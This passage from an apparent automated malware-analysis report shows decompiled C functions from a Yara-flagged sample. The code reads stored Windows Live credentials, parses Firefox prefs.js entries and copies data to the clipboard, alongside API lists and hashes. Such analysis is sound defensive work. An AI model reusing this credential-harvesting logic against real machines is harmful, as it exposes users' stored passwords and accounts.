                                                  						L20:
                                                  						_v788(_v808);
                                                  						goto L21;
                                                  					} else {
                                                  						do {
                                                  							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
                                                  							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
                                                  								_v772 = 0;
                                                  								memset( &_v771, 0, 0xff);
                                                  								_t96 = _t96 + 0xc;
                                                  								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
                                                  									_push(0x11);
                                                  									_t65 =  &_v772;
                                                  									_push("windowslive:name=");
                                                  									_push(_t65);
                                                  									L00411612();
                                                  									_t96 = _t96 + 0xc;
                                                  									if(_t65 == 0) {
                                                  										_v516 = 0;
                                                  										_v260 = 0;
                                                  										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
                                                  										_t68 =  *(_t92 + 0x18);
                                                  										if(_t68 > 0) {
                                                  											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
                                                  											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
                                                  										}
                                                  										if(_v260 == 0) {
                                                  											_t69 = _a4;
                                                  											_t44 = _t69 + 8;
                                                  											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
                                                  											__eflags =  *_t44;
                                                  										} else {
                                                  											_t93 = _a4;
                                                  											 *((intOrPtr*)( *_t93 + 4))( &_v516);
                                                  											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  							_t58 = _v804 + 1;
                                                  							_v804 = _t58;
                                                  						} while (_t58 < _v812);
                                                  						goto L20;
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                  • memset.MSVCRT ref: 0040D917
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
                                                  • _strnicmp.MSVCRT ref: 0040D948
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                  • String ID: WindowsLive:name=*$windowslive:name=
                                                  • API String ID: 945165440-3589380929
                                                  • Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                  • Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
                                                  • Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                  • Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E00407FEB(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                  				void _v259;
                                                  				char _v260;
                                                  				void _v4359;
                                                  				char _v4360;
                                                  				int _t17;
                                                  				CHAR* _t26;
                                                  
                                                  				E004118A0(0x1104, __ecx);
                                                  				_v4360 = 0;
                                                  				memset( &_v4359, 0, 0x1000);
                                                  				_t17 = GetDlgCtrlID(_a4);
                                                  				_t35 = _t17;
                                                  				GetWindowTextA(_a4,  &_v4360, 0x1000);
                                                  				if(_t17 > 0 && _v4360 != 0) {
                                                  					_v260 = 0;
                                                  					memset( &_v259, 0, 0xff);
                                                  					GetClassNameA(_a4,  &_v260, 0xff);
                                                  					_t26 =  &_v260;
                                                  					_push("sysdatetimepick32");
                                                  					_push(_t26);
                                                  					L004115B2();
                                                  					if(_t26 != 0) {
                                                  						E00407EC3(_t35,  &_v4360);
                                                  					}
                                                  				}
                                                  				return 1;
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 00408011
                                                  • GetDlgCtrlID.USER32 ref: 0040801C
                                                  • GetWindowTextA.USER32 ref: 0040802F
                                                  • memset.MSVCRT ref: 00408055
                                                  • GetClassNameA.USER32(?,?,000000FF), ref: 00408068
                                                  • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 0040807A
                                                    • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                                                  • String ID: sysdatetimepick32
                                                  • API String ID: 896699463-4169760276
                                                  • Opcode ID: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                  • Instruction ID: 1a4d9fd07e56cfca2567f2ea4562d04845e15f14fd3b0b17285a92413f4c7fe9
                                                  • Opcode Fuzzy Hash: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                  • Instruction Fuzzy Hash: 8811E3728040187EDB119B64DC81DEB7BACEF58355F0440BBFB49E2151EA789FC88B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E00405715(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
                                                  				signed int _v8;
                                                  				intOrPtr _v16;
                                                  				void* __esi;
                                                  				void* _t74;
                                                  				void* _t75;
                                                  				signed int _t76;
                                                  				signed int _t89;
                                                  				signed int _t90;
                                                  				void* _t98;
                                                  				void* _t101;
                                                  				short* _t118;
                                                  				unsigned int _t126;
                                                  				intOrPtr _t128;
                                                  				signed int _t131;
                                                  				void* _t144;
                                                  				intOrPtr* _t146;
                                                  				short _t153;
                                                  				signed int _t155;
                                                  
                                                  				_t129 = __ecx;
                                                  				_push(__ecx);
                                                  				_t74 = _a4 - 0x4e;
                                                  				_t155 = __ecx;
                                                  				if(_t74 == 0) {
                                                  					_t146 = _a12;
                                                  					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
                                                  					if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {
                                                  						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
                                                  						if(__eflags == 0) {
                                                  							E00404D42(__eflags,  *_t146,  *(_t146 + 0xc));
                                                  						}
                                                  					}
                                                  					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
                                                  					if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {
                                                  						L27:
                                                  						_t75 = 0;
                                                  						__eflags = 0;
                                                  						goto L28;
                                                  					} else {
                                                  						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
                                                  						if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
                                                  							goto L27;
                                                  						}
                                                  						_t76 =  *(_t146 + 0x14);
                                                  						__eflags = _t76 & 0x00000002;
                                                  						if((_t76 & 0x00000002) == 0) {
                                                  							L36:
                                                  							_t131 =  *(_t146 + 0x18) ^ _t76;
                                                  							__eflags = 0x0000f000 & _t131;
                                                  							if((0x0000f000 & _t131) == 0) {
                                                  								L39:
                                                  								__eflags =  *(_t146 + 0x14) & 0x00000002;
                                                  								if(( *(_t146 + 0x14) & 0x00000002) == 0) {
                                                  									goto L27;
                                                  								}
                                                  								__eflags =  *(_t146 + 0x18) & 0x00000002;
                                                  								if(( *(_t146 + 0x18) & 0x00000002) != 0) {
                                                  									goto L27;
                                                  								}
                                                  								__eflags =  *(_t146 + 0xc);
                                                  								E00401469(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
                                                  								__eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
                                                  								E00401469(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
                                                  								 *((intOrPtr*)(_t155 + 0x14)) = 1;
                                                  								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
                                                  								 *((intOrPtr*)(_t155 + 0x14)) = 0;
                                                  								_t75 = 1;
                                                  								L28:
                                                  								return _t75;
                                                  							}
                                                  							L37:
                                                  							_t89 = E004048DC( *_t146,  *(_t146 + 0xc), 0xf002);
                                                  							__eflags = _t89 & 0x00000002;
                                                  							if((_t89 & 0x00000002) != 0) {
                                                  								_t90 = _t89 & 0x0000f000;
                                                  								__eflags = _t90 - 0x1000;
                                                  								_v8 = _t90;
                                                  								E00401469(_t155, 0x3ee, 0 | _t90 == 0x00001000);
                                                  								_v16 - 0x2000 = _v16 == 0x2000;
                                                  								E00401469(_t155, 0x3ef, 0 | _v16 == 0x00002000);
                                                  							}
                                                  							goto L39;
                                                  						}
                                                  						__eflags =  *(_t146 + 0x18) & 0x00000002;
                                                  						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
                                                  							goto L37;
                                                  						}
                                                  						goto L36;
                                                  					}
                                                  				}
                                                  				_t98 = _t74 - 0xc2;
                                                  				if(_t98 == 0) {
                                                  					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
                                                  					E0040559F(_t155);
                                                  					goto L27;
                                                  				}
                                                  				_t101 = _t98 - 1;
                                                  				if(_t101 != 0) {
                                                  					goto L27;
                                                  				}
                                                  				_t126 = _a8 >> 0x10;
                                                  				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
                                                  					L7:
                                                  					if(_t126 != 0) {
                                                  						goto L27;
                                                  					}
                                                  					if(_a8 != 0x3f0) {
                                                  						L13:
                                                  						if(_a8 == 0x3eb) {
                                                  							E00404B35(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
                                                  						}
                                                  						if(_a8 == 0x3ec) {
                                                  							E00404B78(GetDlgItem( *(_t155 + 4), 0x3e9));
                                                  						}
                                                  						if(_a8 == 0x3ee) {
                                                  							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
                                                  						}
                                                  						if(_a8 == 0x3ef) {
                                                  							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
                                                  						}
                                                  						if(_a8 == 2) {
                                                  							EndDialog( *(_t155 + 4), 2);
                                                  						}
                                                  						if(_a8 == 1) {
                                                  							E00405538(_t155);
                                                  							EndDialog( *(_t155 + 4), 1);
                                                  						}
                                                  						_t75 = 1;
                                                  						goto L28;
                                                  					}
                                                  					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
                                                  					_t129 = 0;
                                                  					if(_t128 <= 0) {
                                                  						L12:
                                                  						E0040559F(_t155);
                                                  						goto L13;
                                                  					}
                                                  					_t144 = 0;
                                                  					do {
                                                  						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
                                                  						 *(_t118 + 2) = _t129;
                                                  						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
                                                  						_t129 = _t129 + 1;
                                                  						_t144 = _t144 + 0x14;
                                                  						 *_t118 = _t153;
                                                  					} while (_t129 < _t128);
                                                  					goto L12;
                                                  				} else {
                                                  					if(_a8 != 0x3ed) {
                                                  						goto L27;
                                                  					} else {
                                                  						E004054C6(__ecx, __ecx);
                                                  						goto L7;
                                                  					}
                                                  				}
                                                  			}
                                                  0x0040579b
                                                  0x00000000
                                                  0x00405751
                                                  0x00405757
                                                  0x00000000
                                                  0x0040575d
                                                  0x0040575d
                                                  0x00000000
                                                  0x0040575d
                                                  0x00405757

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 004057BD
                                                  • GetDlgItem.USER32 ref: 004057D0
                                                  • GetDlgItem.USER32 ref: 004057E5
                                                  • GetDlgItem.USER32 ref: 004057FD
                                                  • EndDialog.USER32(?,00000002), ref: 00405819
                                                  • EndDialog.USER32(?,00000001), ref: 0040582C
                                                    • Part of subcall function 004054C6: GetDlgItem.USER32 ref: 004054D4
                                                    • Part of subcall function 004054C6: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054E9
                                                    • Part of subcall function 004054C6: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405505
                                                  • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405844
                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405950
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Item$DialogMessageSend
                                                  • String ID:
                                                  • API String ID: 2485852401-0
                                                  • Opcode ID: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                  • Instruction ID: 996ad43d7974a89766dbed28e3aed2d7518275209d6347d70af2c8e68d8db374
                                                  • Opcode Fuzzy Hash: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                  • Instruction Fuzzy Hash: 8361BE31600A05AFDB21AF25C986A2BB3A5EF40724F04C13EF915A76D1D778A960CF59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E00405960(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
                                                  				RECT* _v8;
                                                  				void* __esi;
                                                  				void* _t39;
                                                  				signed int _t41;
                                                  				void* _t42;
                                                  				struct HWND__* _t47;
                                                  				signed int _t53;
                                                  				void* _t54;
                                                  				signed int _t76;
                                                  				signed int _t78;
                                                  				void* _t80;
                                                  				void** _t82;
                                                  				signed int _t86;
                                                  				void* _t90;
                                                  				signed int _t91;
                                                  
                                                  				_t80 = __edi;
                                                  				_push(_t58);
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				L004115D0();                      // operator new (??2@ in the API ID below): 12-byte object
                                                  				if(__eax == 0) {
                                                  					_t82 = 0;
                                                  				} else {
                                                  					 *((intOrPtr*)(__eax)) = 0;
                                                  					_t82 = __eax;
                                                  				}
                                                  				 *(_t80 + 0xc) = _t82;
                                                  				_t39 =  *_t82;
                                                  				_t90 = _t39;
                                                  				if(_t90 != 0) {
                                                  					_push(_t39);
					L004115D6();                  // operator delete (??3@): free the previous element array
                                                  					 *_t82 = 0;
                                                  				}
                                                  				_t82[2] = _a8;
                                                  				_t41 = E004049FB(_a8);
                                                  				_t76 = 4;
                                                  				_t82[1] = _t41;
                                                  				_t42 = _t41 * _t76;
                                                  				_push( ~(0 | _t90 > 0x00000000) | _t42);
                                                  				L004115D0();
                                                  				 *_t82 = _t42;
                                                  				memset(_t42, 0, _t82[1] << 2);
                                                  				E00408441( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
                                                  				_t91 =  *(_t80 + 0x10);
                                                  				if(_t91 == 0) {
                                                  					_t86 = ( *(_t80 + 0xc))[1];
                                                  					_t78 = 0x14;
                                                  					_t53 = _t86 * _t78;
                                                  					_push( ~(0 | _t91 > 0x00000000) | _t53);
                                                  					L004115D0();
                                                  					 *(_t80 + 0x10) = _t53;
                                                  					if(_t86 > 0) {
                                                  						_t54 = 0;
                                                  						do {
                                                  							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
                                                  							_t54 = _t54 + 0x14;
                                                  							_t86 = _t86 - 1;
                                                  						} while (_t86 != 0);
                                                  					}
                                                  					_v8 = 1;
                                                  				}
                                                  				if(E00401540(0x448, _t80, _a4) == 1) {
                                                  					E004083B1( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
                                                  					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
                                                  				}
                                                  				_t47 = SetFocus(_a8);
                                                  				if(_v8 != 0) {
                                                  					_push( *(_t80 + 0x10));
                                                  					L004115D6();
                                                  				}
                                                  				return _t47;
                                                  			}

Instruction address column for E00405960 (0x00405960 - 0x00405a61; the extraction kept only the addresses, not the instruction text).

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                  • String ID:
                                                  • API String ID: 2313361498-0
                                                  • Opcode ID: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                  • Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
                                                  • Opcode Fuzzy Hash: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                  • Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040A698(void* __esi) {
                                                  				struct HDWP__* _v8;
                                                  				int _v12;
                                                  				intOrPtr _v16;
                                                  				struct tagRECT _v32;
                                                  				struct tagRECT _v48;
                                                  				void* _t32;
                                                  				int _t60;
                                                  				int _t65;
                                                  
                                                  				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
                                                  					GetClientRect( *(__esi + 0x108),  &_v32);
                                                  					GetWindowRect( *(__esi + 0x114),  &_v48);
                                                  					_t65 = _v48.bottom - _v48.top + 1;
                                                  					GetWindowRect( *(__esi + 0x118),  &_v48);
                                                  					_v12 = _v32.right - _v32.left;
                                                  					_t60 = _v48.bottom - _v48.top + 1;
                                                  					_v16 = _v32.bottom - _v32.top;
                                                  					_v8 = BeginDeferWindowPos(3);
                                                  					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
                                                  					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
                                                  					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
                                                  					return EndDeferWindowPos(_v8);
                                                  				}
                                                  				return _t32;
                                                  			}

Instruction address column for E0040A698 (0x0040a6a5 - 0x0040a773; the extraction kept only the addresses, not the instruction text).

                                                  APIs
                                                  • GetClientRect.USER32 ref: 0040A6B7
                                                  • GetWindowRect.USER32 ref: 0040A6CD
                                                  • GetWindowRect.USER32 ref: 0040A6E0
                                                  • BeginDeferWindowPos.USER32 ref: 0040A6FD
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A71A
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A73A
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A761
                                                  • EndDeferWindowPos.USER32(?), ref: 0040A76A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Defer$Rect$BeginClient
                                                  • String ID:
                                                  • API String ID: 2126104762-0
                                                  • Opcode ID: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                  • Instruction ID: 87e3885615821b4149b7d1c90d618f2f4546f2004ccbdac015d6c62594ca92fd
                                                  • Opcode Fuzzy Hash: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                  • Instruction Fuzzy Hash: 1E21A771A00209FFDB11CFA8DE89FEEBBB9FB08710F104465F655E2160C771AA519B24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E00406069(void* _a4) {
                                                  				signed int _t11;
                                                  				int _t13;
                                                  				void* _t17;
                                                  				signed int _t19;
                                                  				void* _t22;
                                                  
				_t22 = _a4;                                   // NUL-terminated string to place on the clipboard
				_t19 = 0;
				EmptyClipboard();                             // no OpenClipboard here: the clipboard must already be open (caller at 0x0040AEA7)
				if(_t22 != 0) {
					_t2 = strlen(_t22) + 1; // 0x1
					_t13 = _t2;
					_t17 = GlobalAlloc(0x2000, _t13);         // 0x2000 = GMEM_DDESHARE; strlen+1 bytes for the copy
					if(_t17 != 0) {
						memcpy(GlobalLock(_t17), _t22, _t13);
						GlobalUnlock(_t17);
						_t11 = SetClipboardData(1, _t17);     // 1 = CF_TEXT; ownership of _t17 passes to the clipboard
						asm("sbb esi, esi");
						_t19 =  ~( ~_t11);                    // neg/sbb/neg idiom: _t19 = (_t11 != 0)
					}
				}
				CloseClipboard();
				return _t19;                                  // 1 on success, 0 otherwise
                                                  			}

Instruction address column for E00406069 (0x0040606a - 0x004060cf; the extraction kept only the addresses, not the instruction text).

                                                  APIs
                                                  • EmptyClipboard.USER32(?,?,0040AEA7,?), ref: 00406071
                                                  • strlen.MSVCRT ref: 0040607E
                                                  • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
                                                  • GlobalLock.KERNEL32 ref: 0040609A
                                                  • memcpy.MSVCRT ref: 004060A3
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004060AC
                                                  • SetClipboardData.USER32 ref: 004060B5
                                                  • CloseClipboard.USER32 ref: 004060C5
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                  • String ID:
                                                  • API String ID: 3116012682-0
                                                  • Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                  • Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
                                                  • Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                  • Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 80%
                                                  			E0040C530(void* __eflags, intOrPtr* _a4) {
                                                  				int _v8;
                                                  				char _v12;
                                                  				intOrPtr _v16;
                                                  				void _v1029;
                                                  				void _v1039;
                                                  				char _v1040;
                                                  				void _v2063;
                                                  				void _v2064;
                                                  				void _v3087;
                                                  				void _v3088;
                                                  				void* __ebx;
                                                  				intOrPtr _t53;
                                                  				void* _t54;
                                                  				void* _t56;
                                                  				void* _t59;
                                                  				void* _t60;
                                                  				void* _t67;
                                                  				void* _t68;
                                                  				void* _t73;
                                                  				void* _t85;
                                                  				int _t86;
                                                  				void* _t106;
                                                  				int _t107;
                                                  				int _t111;
                                                  				void* _t114;
                                                  				void* _t115;
                                                  				void* _t116;
                                                  
				// Three zeroed 1 KiB buffers: the current line (_v1040), the
				// extracted pref name (_v3088) and the extracted value (_v2064).
				_v1040 = 0;
				memset( &_v1039, 0, 0x3ff);
				_v3088 = 0;
				memset( &_v3087, 0, 0x3ff);
				_v2064 = 0;
				memset( &_v2063, 0, 0x3ff);
                                                  				_t116 = _t115 + 0x24;
				// E00406B74 opens whatever the object at _a4+4 refers to (probably the prefs.js
				// path) and E00406900 reads it one line at a time into _v1040, with _v12 as
				// the cursor state; a zero return means end of input.
				_t53 = E00406B74(_a4 + 4);
				_v12 = 0;
				_v16 = _t53;
				_t54 = E00406900(_t53,  &_v1040,  &_v1040,  &_v12);
				if(_t54 != 0) {
                                                  					do {
						// Only lines that start with user_pref(" are of interest: that is the
						// Firefox prefs.js entry format, user_pref("name", value);  E004069D2
						// behaves like a substring search that returns the match offset.
						_t56 = E004069D2(0, "user_pref(\"");
                                                  						_pop(_t92);
                                                  						if(_t56 != 0) {
                                                  							goto L10;
                                                  						}
                                                  						_push(0x412b10);
                                                  						_t60 = 0xb;
                                                  						_t14 = E004069D2(_t60) - 0xb; // -11
                                                  						_t92 = _t14;
                                                  						_v8 = _t92;
                                                  						if(_t92 <= 0) {
                                                  							goto L10;
                                                  						}
                                                  						_t85 = E004069D2(_t61 + 1, 0x412b18);
                                                  						_t17 = _t85 + 1; // 0x1
                                                  						_t106 = E004069D2(_t17, 0x412b10);
						// No further string delimiter after the name: the value is bare
						// (number or true/false) and ends at ')'. Otherwise it is quoted.
						if(_t106 <= 0) {
                                                  							_t28 = _t85 + 1; // 0x1
                                                  							_t67 = E004069D2(_t28, ")");
                                                  							_pop(_t92);
                                                  							_t68 = 0xfffffffe;
                                                  							_t111 = _t67 + _t68 - _t85;
                                                  							if(_t111 <= 0) {
                                                  								goto L10;
                                                  							}
                                                  							_t107 = _v8;
                                                  							memcpy( &_v3088,  &_v1029, _t107);
                                                  							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
                                                  							_t73 = _t114 + _t85 - 0x40a;
                                                  							L9:
                                                  							memcpy( &_v2064, _t73, _t111);
                                                  							_t92 = _a4;
                                                  							_t116 = _t116 + 0x18;
                                                  							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
                                                  							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
                                                  							if(_t59 == 0) {
                                                  								break;
                                                  							}
                                                  							goto L10;
                                                  						}
                                                  						_t20 = _t106 + 1; // 0x1
                                                  						_t111 = E004069D2(_t20, 0x412b10) - _t106 - 1;
                                                  						_pop(_t92);
                                                  						if(_t111 <= 0) {
                                                  							goto L10;
                                                  						}
                                                  						_t86 = _v8;
                                                  						memcpy( &_v3088,  &_v1029, _t86);
                                                  						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
                                                  						_t73 = _t114 + _t106 - 0x40b;
                                                  						goto L9;
                                                  						L10:
                                                  						_t59 = E00406900(_v16, _t92,  &_v1040,  &_v12);
                                                  					} while (_t59 != 0);
                                                  					return _t59;
                                                  				}
                                                  				return _t54;
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpymemset$strlen$_memicmp
                                                  • String ID: user_pref("
                                                  • API String ID: 765841271-2487180061
                                                  • Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                  • Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
                                                  • Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                  • Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 61%
                                                  			E0040559F(intOrPtr _a4) {
                                                  				struct HWND__* _v12;
                                                  				signed int _v16;
                                                  				int _v20;
                                                  				int _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				int _v48;
                                                  				char* _v52;
                                                  				void* _v64;
                                                  				void _v319;
                                                  				char _v320;
                                                  				struct HWND__* _t53;
                                                  				intOrPtr* _t59;
                                                  				void* _t61;
                                                  				intOrPtr _t66;
                                                  				void* _t74;
                                                  				void* _t80;
                                                  				intOrPtr _t81;
                                                  				void* _t84;
                                                  				intOrPtr _t89;
                                                  				short _t91;
                                                  				signed int _t94;
                                                  				short* _t95;
                                                  				void* _t96;
                                                  				void* _t97;
                                                  
                                                  				_t89 = _a4;
                                                  				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
                                                  				_v12 = _t53;
                                                  				SendMessageA(_t53, 0x1009, 0, 0);
                                                  				SendMessageA(_v12, 0x1036, 0, 0x26);
                                                  				do {
                                                  				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
                                                  				_push(0xc8);
                                                  				_push(0);
                                                  				_push(0);
                                                  				_push(_v12);
                                                  				_t80 = 6;
                                                  				E00404925(0x412466, _t80);
                                                  				_t59 =  *((intOrPtr*)(_t89 + 0xc));
                                                  				_t81 =  *((intOrPtr*)(_t59 + 4));
                                                  				_t97 = _t96 + 0x10;
                                                  				_v32 = _t81;
                                                  				_v28 =  *_t59;
                                                  				_v20 = 0;
                                                  				if(_t81 <= 0) {
                                                  					L10:
                                                  					_t61 = 2;
